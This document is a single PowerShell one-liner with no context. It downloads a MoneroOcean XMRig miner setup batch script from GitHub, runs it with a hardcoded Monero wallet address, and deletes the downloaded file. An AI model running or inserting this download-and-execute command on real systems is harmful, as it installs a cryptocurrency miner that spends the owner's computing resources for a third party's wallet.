powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 47HhjMXTqVLgJmeW1dza3v2ijyD6rNgZEN4HphvaTUVHGi9LhSUry9nK2kw6wkkW5U5Ku6uaZCqj53wZt4MjmzZX4XdoJhr; Remove-Item -Force $tempfile"